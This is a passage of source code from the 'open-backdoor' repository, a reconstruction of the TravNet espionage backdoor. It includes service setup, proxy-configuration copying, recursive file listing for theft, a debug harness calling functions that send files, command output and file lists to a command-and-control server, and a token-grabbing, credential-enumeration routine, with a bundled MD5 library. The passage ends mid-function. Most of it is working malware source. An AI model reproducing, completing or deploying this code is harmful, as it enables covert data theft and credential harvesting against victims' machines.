szBuf512, g_szDNList); 123 | 124 | GetPrivateProfileString ("Other", "UP", "False", szBuf512, 64, g_szStat_T); 125 | 126 | // ------------------ COPY PROXY CONFIG TO CONFIG_T ------------------ 127 | CHAR szWinDir[260]; 128 | CHAR szConfigPath[260]; 129 | 130 | GetWindowsDirectory(szWinDir, 260); 131 | sprintf(szConfigPath, "%s\\system\\config_t.dat", szWinDir); 132 | 133 | if (_stricmp(szBuf512, "True")) 134 | { 135 | WritePrivateProfileString("Other", "UP", "0", szConfigPath); 136 | return TRUE; 137 | } 138 | 139 | WritePrivateProfileString ("Other", "UP", "1", szConfigPath); 140 | 141 | GetPrivateProfileString ("Other", "PS", g_szBlank, szBuf512, 64, g_szStat_T); 142 | WritePrivateProfileString ("Other", "PS", szBuf512, szConfigPath); 143 | 144 | GetPrivateProfileString ("Other", "PP", "80", szBuf512, 8, g_szStat_T); 145 | WritePrivateProfileString ("Other", "PP", szBuf512, szConfigPath); 146 | 147 | GetPrivateProfileString ("Other", "PU", g_szBlank, szBuf512, 32, g_szStat_T); 148 | WritePrivateProfileString ("Other", "PU", szBuf512, szConfigPath); 149 | 150 | GetPrivateProfileString ("Other", "PW", g_szBlank, szBuf512, 32, g_szStat_T); 151 | WritePrivateProfileString ("Other", "PW", szBuf512, szConfigPath); 152 | 153 | GetPrivateProfileString ("Other", "PF", "10", szBuf512, 32, g_szStat_T); 154 | WritePrivateProfileString ("Other", "PF", szBuf512, szConfigPath); 155 | 156 | return TRUE; 157 | } 158 | 159 | void LoadProxyConfig() 160 | { 161 | CHAR szWinDir[260]; 162 | GetWindowsDirectory(szWinDir, 260); 163 | 164 | CHAR szConfigPath[260]; 165 | sprintf(szConfigPath, "%s\\system\\config_t.dat", szWinDir); 166 | 167 | if (FALSE == GetPrivateProfileInt("Other", "UP", 0, szConfigPath)) 168 | { 169 | g_bUseProxy = FALSE; 170 | return; 171 | } 172 | 173 | g_bUseProxy = TRUE; 174 | 175 | CHAR szValue[64]; 176 | GetPrivateProfileString("Other", "PS", g_szBlank, szValue, 64, szConfigPath); 177 | memset(g_nProxy_IP, 0, 260); 178 | sprintf(g_nProxy_IP, "%s", szValue); 179 | 180 | GetPrivateProfileString("Other", "PP", "80", g_nProxy_PORT, 8, szConfigPath); 181 | GetPrivateProfileString("Other", "PU", g_szBlank, szValue, 32, szConfigPath); 182 | memset(g_nProxy_USER, 0, 32); 183 | sprintf(g_nProxy_USER, "%s", szValue); 184 | 185 | GetPrivateProfileString("Other", "PW", g_szBlank, szValue, 32, szConfigPath); 186 | memset(g_nProxy_PSW, 0, 32); 187 | sprintf(g_nProxy_PSW, "%s", szValue); 188 | 189 | g_nProxy_UNK = GetPrivateProfileInt("Other", "PF", 10, szConfigPath); 190 | } 191 | 192 | void GetFolderRecursive(char *szFolder, int *k) 193 | { 194 | if (szFolder[strlen(szFolder) - 1] != '\\') 195 | sprintf(szFolder, "%s\\", szFolder); 196 | 197 | CHAR szSearchPattern[260]; 198 | sprintf(szSearchPattern, "%s*.*", szFolder); 199 | 200 | WIN32_FIND_DATA FindFileData; 201 | HANDLE hFindFile = FindFirstFile(szSearchPattern, &FindFileData); 202 | if (INVALID_HANDLE_VALUE == hFindFile) 203 | return; 204 | 205 | char szFullPath[260]; 206 | char szFileName[260]; 207 | do 208 | { 209 | if (_stricmp(FindFileData.cFileName, ".") && _stricmp(FindFileData.cFileName, "..")) 210 | { 211 | if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) 212 | { 213 | strcpy(szFileName, FindFileData.cFileName); 214 | sprintf(szFullPath, "%s%s", szFolder, szFileName); 215 | 216 | GetFolderFirstLevel(szFullPath, k); 217 | GetFolderRecursive(szFullPath, k); 218 | } 219 | } 220 | } 221 | while (FindNextFile(hFindFile, &FindFileData)); 222 | FindClose(hFindFile); 223 | } 224 | 225 | void GetFolderFirstLevel(char *szFolder, int *k) 226 | { 227 | if (szFolder[strlen(szFolder) - 1] != '\\') 228 | sprintf(szFolder, "%s\\", szFolder); 229 | 230 | CHAR szSearchPattern[260]; 231 | sprintf(szSearchPattern, "%s*.*", szFolder); 232 | 233 | WIN32_FIND_DATA FindFileData; 234 | HANDLE hFindFile = FindFirstFile(szSearchPattern, &FindFileData); 235 | if (INVALID_HANDLE_VALUE == hFindFile) 236 | return; 237 | 238 | CHAR szFileName[260]; 239 | CHAR szFileIndex[260]; 240 | CHAR szFullPath[260]; 241 | do 242 | { 243 | if (_stricmp(FindFileData.cFileName, ".") && _stricmp(FindFileData.cFileName, "..")) 244 | { 245 | if (!(FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) 246 | { 247 | ++*k; 248 | 249 | strcpy(szFileName, FindFileData.cFileName); 250 | sprintf(szFullPath, "%s%s", szFolder, szFileName); 251 | 252 | sprintf(szFileIndex, "f%d", *k); 253 | WritePrivateProfileString("Filelist", szFileIndex, szFullPath, g_szDNList); 254 | } 255 | } 256 | } 257 | while (FindNextFile(hFindFile, &FindFileData)); 258 | FindClose(hFindFile); 259 | } -------------------------------------------------------------------------------- /open-backdoor/main.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include 6 | #include 7 | 8 | #include "StdAfx.hpp" 9 | #include "config.hpp" 10 | #include "connection.hpp" 11 | #include "setup.hpp" 12 | #include "utils.hpp" 13 | #include "core.hpp" 14 | #include "device.hpp" 15 | 16 | // --------------- BEGIN DEFINED --------------- 17 | DWORD g_dwMaxFileSizeKB = 10240; 18 | BOOL g_bUseTypeLimit = TRUE; 19 | BOOL g_bUTypeLimit = TRUE; 20 | // --------------- END DEFINED --------------- 21 | 22 | // --------------- BEGIN NOT DEFINED --------------- 23 | CHAR g_nProxy_IP__TEST[32]; 24 | CHAR g_nProxy_PORT__TEST[32]; 25 | CHAR g_nProxy_USER__TEST[32]; 26 | CHAR g_nProxy_PSW__TEST[192]; 27 | 28 | CHAR g_szTmpPath[260]; 29 | CHAR g_szUDIdx[260]; 30 | CHAR g_szUEnumFS[260]; 31 | CHAR g_szAcceptedFileTypes[324]; 32 | 33 | DWORD g_dwServiceStatus; 34 | SERVICE_STATUS_HANDLE g_hServiceStatus; 35 | 36 | CHAR g_szVolumeSerialNr[260]; 37 | CHAR g_szHostByName[16]; 38 | CHAR g_szHostname[260]; 39 | 40 | DWORD g_nProxy_UNK; 41 | CHAR g_nProxy_IP[260]; 42 | CHAR g_nProxy_PORT[8]; 43 | CHAR g_nProxy_USER[32]; 44 | CHAR g_nProxy_PSW[32]; 45 | 46 | char g_szEnumFS[260]; 47 | char g_szDNList[260]; 48 | char g_szStat_T[260]; 49 | char g_szSysDir[260]; 50 | 51 | DWORD g_nUploadRate; 52 | DWORD g_nDownCmdTime; 53 | 54 | CHAR g_szWebPage[264]; 55 | 56 | DWORD g_dwScannedFile2; 57 | 58 | BOOL g_bUseProxy; 59 | 60 | DWORD g_nSentData; 61 | DWORD g_dwLastTickCount; 62 | 63 | HANDLE g_hMutex; 64 | 65 | HANDLE g_lpThread1; 66 | DWORD g_dwThreadId1; 67 | 68 | HINSTANCE g_hInst; 69 | 70 | BOOL g_bUAuto; 71 | DWORD g_dwScannedFile; 72 | BOOL g_bUninstall; 73 | 74 | HANDLE g_lpThread2; 75 | DWORD g_dwThreadId2; 76 | 77 | CHAR g_szModuleLogName[260]; 78 | CHAR g_szTestURL[260]; 79 | 80 | DWORD g_bAutoCheck; 81 | BOOL g_bCheckedSuccess; 82 | 83 | CHAR g_szBlank[4]; // This makes no sense, if the variable is not defined it could have any value 84 | 85 | CHAR g_szLastHashMD5[72]; 86 | // --------------- END NOT DEFINED --------------- 87 | 88 | void Fast_ServiceStatus(DWORD dwState, DWORD dwExitCode, DWORD dwCheckPoint) 89 | { 90 | SERVICE_STATUS ServiceStatus; 91 | 92 | g_dwServiceStatus = dwState; 93 | 94 | ServiceStatus.dwServiceType = SERVICE_WIN32_SHARE_PROCESS; 95 | ServiceStatus.dwCurrentState = dwState; 96 | ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_SHUTDOWN; 97 | ServiceStatus.dwWin32ExitCode = dwExitCode; 98 | ServiceStatus.dwServiceSpecificExitCode = 0; 99 | ServiceStatus.dwCheckPoint = dwCheckPoint; 100 | ServiceStatus.dwWaitHint = 1000; 101 | 102 | SetServiceStatus(g_hServiceStatus, &ServiceStatus); 103 | } 104 | 105 | #ifdef _WINDLL 106 | extern "C" __declspec(dllexport) void ServiceMain() 107 | { 108 | Fast_ServiceStatus(SERVICE_START_PENDING, NO_ERROR, 1); 109 | Fast_ServiceStatus(SERVICE_RUNNING , NO_ERROR, 0); 110 | 111 | HWINSTA hProcWinStat = GetProcessWindowStation(); 112 | HWINSTA hWinStat = OpenWindowStation("winsta0", FALSE, WINSTA_ALL_ACCESS); 113 | if (NULL != hWinStat) 114 | SetProcessWindowStation(hWinStat); 115 | CloseWindowStation(hProcWinStat); 116 | 117 | g_hMutex = CreateMutex(NULL, TRUE, TRAVNET_MUTEX_NAME); 118 | if (ERROR_ALREADY_EXISTS == GetLastError()) 119 | { 120 | CloseHandle(g_hMutex); 121 | return; 122 | } 123 | 124 | Sleep(1000); 125 | if (FALSE == LoadConfig()) 126 | return; 127 | 128 | if (FALSE == g_bCheckedSuccess) 129 | { 130 | LoadProxyConfig(); 131 | 132 | if (g_bUseProxy) 133 | { 134 | sprintf(g_nProxy_IP__TEST , "%s", g_nProxy_IP); 135 | sprintf(g_nProxy_PORT__TEST , "%s", g_nProxy_PORT); 136 | sprintf(g_nProxy_USER__TEST , "%s", g_nProxy_USER); 137 | sprintf(g_nProxy_PSW__TEST , "%s", g_nProxy_PSW); 138 | 139 | if(FALSE == TestProxyConnection() && TRUE == g_bAutoCheck && FALSE == RetriveInfo()) 140 | { 141 | RemoveALL(); 142 | return; 143 | } 144 | } 145 | else if(TRUE == g_bAutoCheck && FALSE == RetriveInfo()) 146 | { 147 | RemoveALL(); 148 | return; 149 | } 150 | 151 | SetCheckSuccess(); 152 | } 153 | 154 | // Start main routine 155 | Sleep(60000); 156 | g_lpThread1 = CreateThread(NULL, 0, g_fnThread1, NULL, 0, &g_dwThreadId1); 157 | 158 | // Wait for new devices 159 | Sleep(10000); 160 | g_lpThread2 = CreateThread(NULL, 0, g_fnThread2, NULL, 0, &g_dwThreadId2); 161 | 162 | do 163 | Sleep(100); 164 | while (g_dwServiceStatus != SERVICE_STOP_PENDING && g_dwServiceStatus != SERVICE_STOPPED); 165 | } 166 | 167 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) 168 | { 169 | if (fdwReason <= DLL_THREAD_ATTACH) 170 | g_hInst = hinstDLL; 171 | 172 | return TRUE; 173 | } 174 | #else // _WINDLL 175 | // Checked and working functions: 176 | // c2.cpp 177 | // ~SendFileToC2 178 | // SendFileTokenToC2 179 | // GetTaskFromC2 180 | // TaskUpdate 181 | // ~GetFromURL 182 | // GetCMDFromC2 183 | // SendCMDRecvToC2 184 | // SendEnumFSToC2 185 | // SendDNListFilesToC2 186 | // config.cpp 187 | // !PropagateConfig 188 | // LoadProxyConfig 189 | // GetFolderRecursive 190 | // GetFolderFirstLevel 191 | // connection.cpp 192 | // TestConnection_NoProxy 193 | // !sub_1000605B 194 | // !sub_10006637 195 | // !TestProxyConnection 196 | // core.cpp 197 | // !g_fnThread1 198 | // TaskReset 199 | // device.cpp 200 | // !g_fnThread2 201 | // !WaitForDeviceToConnect 202 | // ConvertUnitMaskToUnitByte 203 | // EnumFS.cpp 204 | // GenerateEnumFS 205 | // RecursiveDriveScan 206 | // RecursiveFolderScan 207 | // LogFolderContent 208 | // IEHistory.cpp 209 | // IEHistory::IEHistory 210 | // IEHistory::~IEHistory 211 | // IEHistory::Initialize 212 | // !sub_10001264 213 | // !IEHistory::GetHistory 214 | // network_info.cpp 215 | // GetVolumeSerialNumber 216 | // GetHostInfo 217 | // proxy.cpp 218 | // !GetProcessHandle 219 | // !SearchCredentials 220 | // !GetURL_CustomProxy 221 | // !GetURL_NoProxy 222 | // recursive.cpp 223 | // SendUEnumFSToC2 224 | // RecursiveFileSearch 225 | // ScanDevice 226 | // !SendTmpFolderToC2 227 | // setup.cpp 228 | // LoadConfig 229 | // RemoveALL 230 | // #GetSystemTechnicalInfo 231 | // GetProcessList 232 | // #GetNetworkInfo 233 | // WriteLog 234 | // GetProgramFilesEx 235 | // Setup_ 236 | // system_info.cpp 237 | // GetProgramFiles 238 | // ~GetIEHistory 239 | // GetOSVersion 240 | // GetIEVersion 241 | // utils.cpp 242 | // SetNewProxyConfig 243 | // SetProxyDisabled 244 | // SetCheckSuccess 245 | // ~RetriveInfo 246 | 247 | // Partially checked and working functions: 248 | // RetriveInfo: No proxy connection works, connection with proxy has to be tested yet 249 | // GetIEHistory: Function works, but no history is provided for tests 250 | // GetFromURL: No proxy connection works, connection with proxy has to be tested yet 251 | // SendFileToC2: Custom base64 is disabled 252 | 253 | // Checked and NOT working functions: 254 | // GetSystemTechnicalInfo: fails at GetDiskFreeSpaceEx: "return false;" must be replaced with "continue;" 255 | // GetLogicalDrives returns "Q:\" which is not a real drive 256 | // GetNetworkInfo: freezes at WaitForSingleObject due to an exceed in the output (len > 4000) 257 | // INFINITE maybe should be replaced with a timeout 258 | 259 | // NOT checked functions: 260 | // sub_1000605B - No proxy to test with 261 | // sub_10006637 - No proxy to test with 262 | // TestProxyConnection - No proxy to test with 263 | 264 | #include "debug.hpp" 265 | #include "network_info.hpp" 266 | #include "c2.hpp" 267 | #include "EnumFS.hpp" 268 | #include "recursive.hpp" 269 | int main() 270 | { 271 | PRINTDBG("[TRAVNET-CONSOLE]\n"); 272 | PRINTDBG("This executable is only for debug purpose.\n\n"); 273 | 274 | PRINTDBG("\n[INFO]\n"); 275 | 276 | GetVolumeSerialNumber(g_szVolumeSerialNr, 260); 277 | GetHostInfo(g_szHostname, 260, g_szHostByName); 278 | LoadConfig(); 279 | 280 | #ifdef _DEBUG 281 | CHAR szConfigPath[260]; 282 | CHAR szWinDir[260]; 283 | 284 | GetWindowsDirectory(szWinDir, 260); 285 | sprintf(szConfigPath, "%s\\system\\config_t.dat", szWinDir); 286 | 287 | PRINTDBG("Config file : %s\n", szConfigPath); 288 | #endif 289 | 290 | PRINTDBG("Temp file dir: %s\n", g_szTmpPath); 291 | PRINTDBG("UDIdx path : %s\n", g_szUDIdx); 292 | PRINTDBG("UEnumFS path : %s\n", g_szUEnumFS); 293 | PRINTDBG("EnumFS path : %s\n", g_szEnumFS); 294 | PRINTDBG("DNList path : %s\n", g_szDNList); 295 | PRINTDBG("Stat_T path : %s\n", g_szStat_T); 296 | PRINTDBG("System dir : %s\n", g_szSysDir); 297 | 298 | PRINTDBG("\n[FUNCTIONS]\n"); 299 | PRINTDBG("GetTaskFromC2 : %s\n", sc_szTasks[GetTaskFromC2()]); 300 | PRINTDBG("SendCMDRecvToC2: %d\n", SendCMDRecvToC2()); 301 | PRINTDBG("GetCMDFromC2 : %d\n", GetCMDFromC2()); 302 | //PRINTDBG("SendFileToC2 : %d\n", SendFileToC2("local-test-file.txt", "remote-test-file.txt")); 303 | PRINTDBG("GenerateEnumFS : %d\n", GenerateEnumFS()); 304 | PRINTDBG("SendEnumFSToC2 : %d\n", SendEnumFSToC2()); 305 | PRINTDBG("SendDNListFilesToC2 : %d\n", SendDNListFilesToC2()); 306 | 307 | ScanDevice("E:\\"); 308 | PRINTDBG("SendUEnumFSToC2: %d\n", SendUEnumFSToC2()); 309 | 310 | TaskReset(); 311 | 312 | system("pause"); 313 | return 0; 314 | } 315 | #endif // _WINDLL -------------------------------------------------------------------------------- /open-backdoor/3rd-party/md5.c: -------------------------------------------------------------------------------- 1 | /* 2 | * This is an OpenSSL-compatible implementation of the RSA Data Security, Inc. 3 | * MD5 Message-Digest Algorithm (RFC 1321). 4 | * 5 | * Homepage: 6 | * http://openwall.info/wiki/people/solar/software/public-domain-source-code/md5 7 | * 8 | * Author: 9 | * Alexander Peslyak, better known as Solar Designer 10 | * 11 | * This software was written by Alexander Peslyak in 2001. No copyright is 12 | * claimed, and the software is hereby placed in the public domain. 13 | * In case this attempt to disclaim copyright and place the software in the 14 | * public domain is deemed null and void, then the software is 15 | * Copyright (c) 2001 Alexander Peslyak and it is hereby released to the 16 | * general public under the following terms: 17 | * 18 | * Redistribution and use in source and binary forms, with or without 19 | * modification, are permitted. 20 | * 21 | * There's ABSOLUTELY NO WARRANTY, express or implied. 22 | * 23 | * (This is a heavily cut-down "BSD license".) 24 | * 25 | * This differs from Colin Plumb's older public domain implementation in that 26 | * no exactly 32-bit integer data type is required (any 32-bit or wider 27 | * unsigned integer data type will do), there's no compile-time endianness 28 | * configuration, and the function prototypes match OpenSSL's. No code from 29 | * Colin Plumb's implementation has been reused; this comment merely compares 30 | * the properties of the two independent implementations. 31 | * 32 | * The primary goals of this implementation are portability and ease of use. 33 | * It is meant to be fast, but not as fast as possible. Some known 34 | * optimizations are not included to reduce source code size and avoid 35 | * compile-time configuration. 36 | */ 37 | 38 | #include 39 | 40 | #include "md5.h" 41 | 42 | /* 43 | * The basic MD5 functions. 44 | * 45 | * F and G are optimized compared to their RFC 1321 definitions for 46 | * architectures that lack an AND-NOT instruction, just like in Colin Plumb's 47 | * implementation. 48 | */ 49 | #define F(x, y, z) ((z) ^ ((x) & ((y) ^ (z)))) 50 | #define G(x, y, z) ((y) ^ ((z) & ((x) ^ (y)))) 51 | #define H(x, y, z) (((x) ^ (y)) ^ (z)) 52 | #define H2(x, y, z) ((x) ^ ((y) ^ (z))) 53 | #define I(x, y, z) ((y) ^ ((x) | ~(z))) 54 | 55 | /* 56 | * The MD5 transformation for all four rounds. 57 | */ 58 | #define STEP(f, a, b, c, d, x, t, s) \ 59 | (a) += f((b), (c), (d)) + (x) + (t); \ 60 | (a) = (((a) << (s)) | (((a) & 0xffffffff) >> (32 - (s)))); \ 61 | (a) += (b); 62 | 63 | /* 64 | * SET reads 4 input bytes in little-endian byte order and stores them 65 | * in a properly aligned word in host byte order. 66 | * 67 | * The check for little-endian architectures that tolerate unaligned 68 | * memory accesses is just an optimization. Nothing will break if it 69 | * doesn't work. 70 | */ 71 | #if defined(__i386__) || defined(__x86_64__) || defined(__vax__) 72 | #define SET(n) \ 73 | (*(MD5_u32plus *)&ptr[(n) * 4]) 74 | #define GET(n) \ 75 | SET(n) 76 | #else 77 | #define SET(n) \ 78 | (ctx->block[(n)] = \ 79 | (MD5_u32plus)ptr[(n) * 4] | \ 80 | ((MD5_u32plus)ptr[(n) * 4 + 1] << 8) | \ 81 | ((MD5_u32plus)ptr[(n) * 4 + 2] << 16) | \ 82 | ((MD5_u32plus)ptr[(n) * 4 + 3] << 24)) 83 | #define GET(n) \ 84 | (ctx->block[(n)]) 85 | #endif 86 | 87 | /* 88 | * This processes one or more 64-byte data blocks, but does NOT update 89 | * the bit counters. There are no alignment requirements. 90 | */ 91 | static const void *body(MD5_CTX *ctx, const void *data, unsigned long size) 92 | { 93 | const unsigned char *ptr; 94 | MD5_u32plus a, b, c, d; 95 | MD5_u32plus saved_a, saved_b, saved_c, saved_d; 96 | 97 | ptr = (const unsigned char *)data; 98 | 99 | a = ctx->a; 100 | b = ctx->b; 101 | c = ctx->c; 102 | d = ctx->d; 103 | 104 | do { 105 | saved_a = a; 106 | saved_b = b; 107 | saved_c = c; 108 | saved_d = d; 109 | 110 | /* Round 1 */ 111 | STEP(F, a, b, c, d, SET(0), 0xd76aa478, 7) 112 | STEP(F, d, a, b, c, SET(1), 0xe8c7b756, 12) 113 | STEP(F, c, d, a, b, SET(2), 0x242070db, 17) 114 | STEP(F, b, c, d, a, SET(3), 0xc1bdceee, 22) 115 | STEP(F, a, b, c, d, SET(4), 0xf57c0faf, 7) 116 | STEP(F, d, a, b, c, SET(5), 0x4787c62a, 12) 117 | STEP(F, c, d, a, b, SET(6), 0xa8304613, 17) 118 | STEP(F, b, c, d, a, SET(7), 0xfd469501, 22) 119 | STEP(F, a, b, c, d, SET(8), 0x698098d8, 7) 120 | STEP(F, d, a, b, c, SET(9), 0x8b44f7af, 12) 121 | STEP(F, c, d, a, b, SET(10), 0xffff5bb1, 17) 122 | STEP(F, b, c, d, a, SET(11), 0x895cd7be, 22) 123 | STEP(F, a, b, c, d, SET(12), 0x6b901122, 7) 124 | STEP(F, d, a, b, c, SET(13), 0xfd987193, 12) 125 | STEP(F, c, d, a, b, SET(14), 0xa679438e, 17) 126 | STEP(F, b, c, d, a, SET(15), 0x49b40821, 22) 127 | 128 | /* Round 2 */ 129 | STEP(G, a, b, c, d, GET(1), 0xf61e2562, 5) 130 | STEP(G, d, a, b, c, GET(6), 0xc040b340, 9) 131 | STEP(G, c, d, a, b, GET(11), 0x265e5a51, 14) 132 | STEP(G, b, c, d, a, GET(0), 0xe9b6c7aa, 20) 133 | STEP(G, a, b, c, d, GET(5), 0xd62f105d, 5) 134 | STEP(G, d, a, b, c, GET(10), 0x02441453, 9) 135 | STEP(G, c, d, a, b, GET(15), 0xd8a1e681, 14) 136 | STEP(G, b, c, d, a, GET(4), 0xe7d3fbc8, 20) 137 | STEP(G, a, b, c, d, GET(9), 0x21e1cde6, 5) 138 | STEP(G, d, a, b, c, GET(14), 0xc33707d6, 9) 139 | STEP(G, c, d, a, b, GET(3), 0xf4d50d87, 14) 140 | STEP(G, b, c, d, a, GET(8), 0x455a14ed, 20) 141 | STEP(G, a, b, c, d, GET(13), 0xa9e3e905, 5) 142 | STEP(G, d, a, b, c, GET(2), 0xfcefa3f8, 9) 143 | STEP(G, c, d, a, b, GET(7), 0x676f02d9, 14) 144 | STEP(G, b, c, d, a, GET(12), 0x8d2a4c8a, 20) 145 | 146 | /* Round 3 */ 147 | STEP(H, a, b, c, d, GET(5), 0xfffa3942, 4) 148 | STEP(H2, d, a, b, c, GET(8), 0x8771f681, 11) 149 | STEP(H, c, d, a, b, GET(11), 0x6d9d6122, 16) 150 | STEP(H2, b, c, d, a, GET(14), 0xfde5380c, 23) 151 | STEP(H, a, b, c, d, GET(1), 0xa4beea44, 4) 152 | STEP(H2, d, a, b, c, GET(4), 0x4bdecfa9, 11) 153 | STEP(H, c, d, a, b, GET(7), 0xf6bb4b60, 16) 154 | STEP(H2, b, c, d, a, GET(10), 0xbebfbc70, 23) 155 | STEP(H, a, b, c, d, GET(13), 0x289b7ec6, 4) 156 | STEP(H2, d, a, b, c, GET(0), 0xeaa127fa, 11) 157 | STEP(H, c, d, a, b, GET(3), 0xd4ef3085, 16) 158 | STEP(H2, b, c, d, a, GET(6), 0x04881d05, 23) 159 | STEP(H, a, b, c, d, GET(9), 0xd9d4d039, 4) 160 | STEP(H2, d, a, b, c, GET(12), 0xe6db99e5, 11) 161 | STEP(H, c, d, a, b, GET(15), 0x1fa27cf8, 16) 162 | STEP(H2, b, c, d, a, GET(2), 0xc4ac5665, 23) 163 | 164 | /* Round 4 */ 165 | STEP(I, a, b, c, d, GET(0), 0xf4292244, 6) 166 | STEP(I, d, a, b, c, GET(7), 0x432aff97, 10) 167 | STEP(I, c, d, a, b, GET(14), 0xab9423a7, 15) 168 | STEP(I, b, c, d, a, GET(5), 0xfc93a039, 21) 169 | STEP(I, a, b, c, d, GET(12), 0x655b59c3, 6) 170 | STEP(I, d, a, b, c, GET(3), 0x8f0ccc92, 10) 171 | STEP(I, c, d, a, b, GET(10), 0xffeff47d, 15) 172 | STEP(I, b, c, d, a, GET(1), 0x85845dd1, 21) 173 | STEP(I, a, b, c, d, GET(8), 0x6fa87e4f, 6) 174 | STEP(I, d, a, b, c, GET(15), 0xfe2ce6e0, 10) 175 | STEP(I, c, d, a, b, GET(6), 0xa3014314, 15) 176 | STEP(I, b, c, d, a, GET(13), 0x4e0811a1, 21) 177 | STEP(I, a, b, c, d, GET(4), 0xf7537e82, 6) 178 | STEP(I, d, a, b, c, GET(11), 0xbd3af235, 10) 179 | STEP(I, c, d, a, b, GET(2), 0x2ad7d2bb, 15) 180 | STEP(I, b, c, d, a, GET(9), 0xeb86d391, 21) 181 | 182 | a += saved_a; 183 | b += saved_b; 184 | c += saved_c; 185 | d += saved_d; 186 | 187 | ptr += 64; 188 | } while (size -= 64); 189 | 190 | ctx->a = a; 191 | ctx->b = b; 192 | ctx->c = c; 193 | ctx->d = d; 194 | 195 | return ptr; 196 | } 197 | 198 | void MD5_Init(MD5_CTX *ctx) 199 | { 200 | ctx->a = 0x67452301; 201 | ctx->b = 0xefcdab89; 202 | ctx->c = 0x98badcfe; 203 | ctx->d = 0x10325476; 204 | 205 | ctx->lo = 0; 206 | ctx->hi = 0; 207 | } 208 | 209 | void MD5_Update(MD5_CTX *ctx, const void *data, unsigned long size) 210 | { 211 | MD5_u32plus saved_lo; 212 | unsigned long used, available; 213 | 214 | saved_lo = ctx->lo; 215 | if ((ctx->lo = (saved_lo + size) & 0x1fffffff) < saved_lo) 216 | ctx->hi++; 217 | ctx->hi += size >> 29; 218 | 219 | used = saved_lo & 0x3f; 220 | 221 | if (used) { 222 | available = 64 - used; 223 | 224 | if (size < available) { 225 | memcpy(&ctx->buffer[used], data, size); 226 | return; 227 | } 228 | 229 | memcpy(&ctx->buffer[used], data, available); 230 | data = (const unsigned char *)data + available; 231 | size -= available; 232 | body(ctx, ctx->buffer, 64); 233 | } 234 | 235 | if (size >= 64) { 236 | data = body(ctx, data, size & ~(unsigned long)0x3f); 237 | size &= 0x3f; 238 | } 239 | 240 | memcpy(ctx->buffer, data, size); 241 | } 242 | 243 | void MD5_Final(unsigned char *result, MD5_CTX *ctx) 244 | { 245 | unsigned long used, available; 246 | 247 | used = ctx->lo & 0x3f; 248 | 249 | ctx->buffer[used++] = 0x80; 250 | 251 | available = 64 - used; 252 | 253 | if (available < 8) { 254 | memset(&ctx->buffer[used], 0, available); 255 | body(ctx, ctx->buffer, 64); 256 | used = 0; 257 | available = 64; 258 | } 259 | 260 | memset(&ctx->buffer[used], 0, available - 8); 261 | 262 | ctx->lo <<= 3; 263 | ctx->buffer[56] = ctx->lo; 264 | ctx->buffer[57] = ctx->lo >> 8; 265 | ctx->buffer[58] = ctx->lo >> 16; 266 | ctx->buffer[59] = ctx->lo >> 24; 267 | ctx->buffer[60] = ctx->hi; 268 | ctx->buffer[61] = ctx->hi >> 8; 269 | ctx->buffer[62] = ctx->hi >> 16; 270 | ctx->buffer[63] = ctx->hi >> 24; 271 | 272 | body(ctx, ctx->buffer, 64); 273 | 274 | result[0] = ctx->a; 275 | result[1] = ctx->a >> 8; 276 | result[2] = ctx->a >> 16; 277 | result[3] = ctx->a >> 24; 278 | result[4] = ctx->b; 279 | result[5] = ctx->b >> 8; 280 | result[6] = ctx->b >> 16; 281 | result[7] = ctx->b >> 24; 282 | result[8] = ctx->c; 283 | result[9] = ctx->c >> 8; 284 | result[10] = ctx->c >> 16; 285 | result[11] = ctx->c >> 24; 286 | result[12] = ctx->d; 287 | result[13] = ctx->d >> 8; 288 | result[14] = ctx->d >> 16; 289 | result[15] = ctx->d >> 24; 290 | 291 | memset(ctx, 0, sizeof(*ctx)); 292 | } 293 | -------------------------------------------------------------------------------- /open-backdoor/proxy.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include "proxy.hpp" 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include "StdAfx.hpp" 12 | 13 | BOOL GetProcessHandle(PHANDLE lpTokenHandle, char *lpszProcName) 14 | { 15 | if (NULL == lpszProcName) 16 | return NULL; 17 | 18 | PROCESSENTRY32 pe = {}; 19 | 20 | __tfnCreateToolhelp32Snapshot lpfnCreateToolhelp32Snapshot = (__tfnCreateToolhelp32Snapshot)GetProcAddress( 21 | LoadLibrary("kernel32.dll"), 22 | "CreateToolhelp32Snapshot" 23 | ); 24 | HANDLE hSnapshot = lpfnCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 25 | 26 | if (INVALID_HANDLE_VALUE == hSnapshot) 27 | return NULL; 28 | 29 | pe.dwSize = sizeof(PROCESSENTRY32); 30 | if (Process32First(hSnapshot, &pe)) 31 | { 32 | for (char *i = lpszProcName; ; i = lpszProcName) 33 | { 34 | if (!strcmp(_strupr(pe.szExeFile), _strupr(i))) 35 | break; 36 | 37 | if (!Process32Next(hSnapshot, &pe)) 38 | return NULL; 39 | } 40 | 41 | HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pe.th32ProcessID); 42 | BOOL bOpenedProcToken = OpenProcessToken(hProc, TOKEN_ALL_ACCESS, lpTokenHandle); 43 | 44 | CloseHandle(hProc); 45 | return bOpenedProcToken; 46 | } 47 | 48 | CloseHandle(hSnapshot); 49 | return NULL; 50 | } 51 | 52 | static const char sc_szEntropyString[37] = "abe2869f-9b47-4cd9-a358-c22904dba7f7"; 53 | 54 | BOOL SearchCredentials(const char *lpszSearchTerm, char *lpszUser, char *lpszPsw) 55 | { 56 | WORD awEntropy[38]; 57 | WORD *v6 = awEntropy; 58 | 59 | WORD *k = awEntropy; 60 | for (int i = 0; i < 37; i++, k++) 61 | *v6 = sc_szEntropyString[i] * 4; 62 | 63 | DATA_BLOB pOptionalEntropy; 64 | 65 | pOptionalEntropy.cbData = 37 * sizeof(WORD); 66 | pOptionalEntropy.pbData = (BYTE*)awEntropy; 67 | 68 | DWORD dwCredCount; 69 | PCREDENTIAL *lpCred; 70 | if (FALSE == CredEnumerate(NULL, 0, 